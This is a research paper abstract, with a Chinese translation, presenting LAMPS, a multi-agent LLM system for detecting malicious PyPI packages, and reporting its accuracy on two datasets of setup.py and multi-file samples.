Malicious code in open-source repositories such as PyPI poses a growing threat to software supply chains. Traditional rule-based tools often overlook the semantic patterns in source code that are crucial for identifying adversarial components. Large language models (LLMs) show promise for software analysis, yet their use in interpretable and modular security pipelines remains limited. This paper presents LAMPS, a multi-agent system that employs collaborative LLMs to detect malicious PyPI packages. The system consists of four role-specific agents for package retrieval, file extraction, classification, and verdict aggregation, coordinated through the CrewAI framework. A prototype combines a fine-tuned CodeBERT model for classification with LLaMA-3 agents for contextual reasoning. LAMPS has been evaluated on two complementary datasets: D1, a balanced collection of 6,000 setup.py files, and D2, a realistic multi-file dataset with 1,296 files and natural class imbalance. On D1, LAMPS achieves 97.7% accuracy, surpassing MPHunter--one of the state-of-the-art approaches. On D2, it reaches 99.5% accuracy and 99.5% balanced accuracy, outperforming RAG-based approaches and fine-tuned single-agent baselines. McNemar's test confirmed these improvements as highly significant. The results demonstrate the feasibility of distributed LLM reasoning for malicious code detection and highlight the benefits of modular multi-agent designs in software supply chain security.
翻译:开源仓库(如PyPI)中的恶意代码对软件供应链构成日益增长的威胁。传统的基于规则的工具常忽略源代码中的语义模式,而这些模式对于识别对抗性组件至关重要。大型语言模型(LLM)在软件分析方面展现出潜力,但其在可解释且模块化的安全流水线中的应用仍有限。本文提出LAMPS,一种采用协作式LLM检测恶意PyPI软件包的多智能体系统。该系统包含四个角色特定的智能体,分别负责软件包检索、文件提取、分类和判定聚合,并通过CrewAI框架进行协调。原型系统结合了用于分类的微调CodeBERT模型与用于上下文推理的LLaMA-3智能体。LAMPS在两个互补数据集上进行了评估:D1为包含6,000个setup.py文件的平衡数据集,D2为包含1,296个文件且具有自然类别不平衡性的真实多文件数据集。在D1上,LAMPS达到97.7%的准确率,超越了当前最先进方法之一的MPHunter。在D2上,其准确率达到99.5%,平衡准确率为99.5%,优于基于RAG的方法和微调的单智能体基线。McNemar检验证实这些改进具有高度显著性。结果证明了分布式LLM推理在恶意代码检测中的可行性,并凸显了模块化多智能体设计在软件供应链安全中的优势。